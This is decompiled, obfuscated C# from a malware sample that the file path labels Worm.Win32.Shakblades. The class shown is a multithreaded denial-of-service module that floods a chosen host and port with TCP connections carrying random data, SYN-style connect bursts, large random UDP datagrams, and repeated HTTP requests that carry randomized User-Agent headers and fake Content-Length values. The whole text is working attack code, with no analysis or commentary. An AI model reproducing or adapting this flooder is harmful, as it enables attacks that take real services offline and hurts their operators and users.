// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.Ј໺঳ᝮᢶᯀ // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using System; using System.Net.Sockets; using System.Text; using System.Threading; namespace Ҧ߲๒ʽ໙ୄᴘ { internal class Ј\u0EFA\u09B3ᝮᢶᯀ { private static Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C ᱽÇᖮᘸ\u09F5ࠍ\u0082ெ; private static bool \u1AA0; private static string ᧂɀᦰᣎᛪ\u0F30; private static int \u0EEBΝᝧԠ; private static int \u1087; private static int ዷᇰᒍɱౡ\u1A8Aᙦ; private static int ṹᎄ\u0027; private static \u07F6\u181Fᒸৃ ᔡᶄᴹᑗ; private static string[] \u0942 = new string[28] { "[W5aioKOUp5yVn5huU4CGfHgznRO9U2lhY25Tipyhl6KqplOBh1w=]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==]", "[OV6Ac3p9dmF5gH92MWRUYT5GRkFBQGZkQEI/QToxX3aFV4OAf4VARD9BMV5eYUBDP0ExOXSAfhE/sm2BcoV6c312TDFYgIB4fXZzgIVAQz9CTDF5hYWBS0BAiIiIP3iAgHh9dj90gH5Ac4CFP3mFfn06]", "[bHZ/bjE5aBE/sm16f19lTDFmOg==]", "[OXSAfoFyhXpzfXZMMV5kWlYxSD9BTBE/sm0xaHp/dYCIhDFfZTFGP0JMMXN4d4U6MQ==]", "[OXSAfoFyhXpzfXZMMV4RP7JtZFpWMUc/QUwxaHp/REM6]", "[OWlCQkwxZkwxXXp/hokxQz9FP0M+QzF6RklHTDF2fz5mZEwRP7JtMX5CSToxWHZ0fIBAQ0FBQkFCREIxX3aFhHRygXZHQEc/QUI=]", "[OWlCQkwxZkwxXXp/hokxekdJR0wxdn8+ZmQRP7JtTDGDh0tBP0o/RDoxWHZ0fIBAQ0FBQkFJQUI=]", "[OWSGf2BkMUY/STGEhn9FhkwRP7JtMWY6MWCBdoNyMUY/QTFsdn9u]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo0]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo1]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo2]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo3]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo4]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo5]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo6]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo7]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo8]", "[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo9]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==0]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==1]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==2]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==3]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==4]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==5]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==6]", "[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==7]" }; private static string[] \u0669ѹᏲբে݅ = new string[10] { "[udvm1djYbAzPpc2bn5qcjA==]", "[udvm1djYbAzPpc2bn5qdjA==]", "[udvm1djYbAzPpc2bn5qijA==]", "[JUdSQURE2DvBDTkHDAYI+A==]", "[JUdSQURE2DvBDTkHDAYIEPg=]", "[JUdSQURE2DvBDTkHDQYI+A==]", "[J0g9SjnYO8ENBxEGCwv4]", "[J0g9SjnYO8ENBxEGCPg=]", "[J0g9SjnYO8ENBxAGEQj4]", "[J0g9SjnYO8ENBxEGEAj4]" }; public static Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C \u083A\u0606ᓙ\u0F03 => Ј\u0EFA\u09B3ᝮᢶᯀ.ᱽÇᖮᘸ\u09F5ࠍ\u0082ெ; public static string \u0E4BᡐḼ { get { switch (Ј\u0EFA\u09B3ᝮᢶᯀ.ᱽÇᖮᘸ\u09F5ࠍ\u0082ெ) { case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2: return \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("Eb314QAADQ==", true); case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ: return \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("[SYN]", true); case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.Ṅ\u0C8D\u0AC6ᩬ\u1A5Fᔅ: return \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("Er314QABDQ==", true); case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ: return \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("ECksNL314QApLC8mMA==", true); default: return (string) null; } } } public static bool ἓ͕ḰIJᅼ\u0ADFধ => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0; public static void ޚቘ\u1A8E\u1361\u0B12\u007F\u05EBෞ( Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C _param0, string _param1, int _param2, int _param3, int _param4, int _param5, \u07F6\u181Fᒸৃ _param6) { Ј\u0EFA\u09B3ᝮᢶᯀ.ᱽÇᖮᘸ\u09F5ࠍ\u0082ெ = _param0; Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30 = _param1; Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ = _param2; Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = _param3; Ј\u0EFA\u09B3ᝮᢶᯀ.ṹᎄ\u0027 = _param4; Ј\u0EFA\u09B3ᝮᢶᯀ.ዷᇰᒍɱౡ\u1A8Aᙦ = _param5; Ј\u0EFA\u09B3ᝮᢶᯀ.ᔡᶄᴹᑗ = _param6; Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false; } public static void ŝἼࠏୌྸʊ᷋() { Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = true; new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.șȓ)).Start(); } public static void ఙᴄϊઆ() => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false; private static void șȓ() { for (int index = 0; index < Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087; ++index) { try { new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.ሸ᪓ᑃॢၥཀ\u16FA)) { IsBackground = true }.Start(); } catch (OutOfMemoryException ex) { Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = index - 1; break; } } } private static void ሸ᪓ᑃॢၥཀ\u16FA() { int num = 0; while (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ.ᔡᶄᴹᑗ.\u0557) { switch (Ј\u0EFA\u09B3ᝮᢶᯀ.ᱽÇᖮᘸ\u09F5ࠍ\u0082ெ) { case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2: Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket1.Blocking = false; while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.ṹᎄ\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0) { if (Ј\u0EFA\u09B3ᝮᢶᯀ.ᔡᶄᴹᑗ.\u0557) { try { socket1.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ); socket1.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ()); socket1.Close(); socket1 = (Socket) null; } catch { socket1.Close(); break; } ++num; Thread.Sleep(1); } else break; } Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ዷᇰᒍɱౡ\u1A8Aᙦ); break; case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ: Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket2.Blocking = false; try { socket2.BeginConnect(Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ, new AsyncCallback(Ј\u0EFA\u09B3ᝮᢶᯀ.ະွ\u1759ໞ\u060Fᣊ\u1B5B), (object) null); } catch { } Thread.Sleep(100); try { if (socket2.Connected) socket2.Disconnect(false); socket2.Close(); } catch { } Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ዷᇰᒍɱౡ\u1A8Aᙦ); break; case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.Ṅ\u0C8D\u0AC6ᩬ\u1A5Fᔅ: Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); socket3.Blocking = false; Socket socket4; try { socket3.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ); while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.ṹᎄ\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ.ᔡᶄᴹᑗ.\u0557) { socket3.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0738Зܫ\u0837ᚖųᮝ()); ++num; Thread.Sleep(1); } socket3.Close(); socket4 = (Socket) null; } catch { socket3.Close(); socket4 = (Socket) null; break; } Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ዷᇰᒍɱౡ\u1A8Aᙦ); break; case Ј\u0EFA\u09B3ᝮᢶᯀ.ք᬴\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ: Socket socket5 = (Socket) null; try { socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket5.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ); socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ()); while (socket5.Connected) { if (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0) { if (Ј\u0EFA\u09B3ᝮᢶᯀ.ᔡᶄᴹᑗ.\u0557) { socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ()); Thread.Sleep(2000); } else break; } else break; } } catch { socket5.Close(); } Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ዷᇰᒍɱౡ\u1A8Aᙦ); break; } num = 0; } if (!Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0) return; Ј\u0EFA\u09B3ᝮᢶᯀ.ఙᴄϊઆ(); } private static void ະွ\u1759ໞ\u060Fᣊ\u1B5B(IAsyncResult _param0) { } private static byte[] \u0738Зܫ\u0837ᚖųᮝ() { Random random = new Random(); byte[] buffer = new byte[random.Next(1470, 65507)]; random.NextBytes(buffer); return buffer; } private static byte[] \u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ() { Random random = new Random(); byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)]; random.NextBytes(buffer); return buffer; } private static byte[] \u0826Ꮽ\u0B72\u1AC1ଲ() { Random random = new Random(); StringBuilder stringBuilder = new StringBuilder(); stringBuilder.AppendLine("GET / HTTP/1.1"); stringBuilder.AppendLine("Host: " + Ј\u0EFA\u09B3ᝮᢶᯀ.ᧂɀᦰᣎᛪ\u0F30); stringBuilder.AppendLine("User-Agent: " + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբে݅[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբে݅.Length - 1)], true) + " " + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942.Length - 1)], true)); stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString()); stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString()); stringBuilder.Append("Connection: keep-alive"); return Encoding.ASCII.GetBytes(stringBuilder.ToString()); } public enum ք᬴\u0609ǟ\u175C { \u0307جᢦ౯᥏\u0DB2, \u0E86ᐪᬞ\u0F0Dਞ, Ṅ\u0C8D\u0AC6ᩬ\u1A5Fᔅ, ľ\u1C99\u1B67șՔᘱ݆ߜ, } } }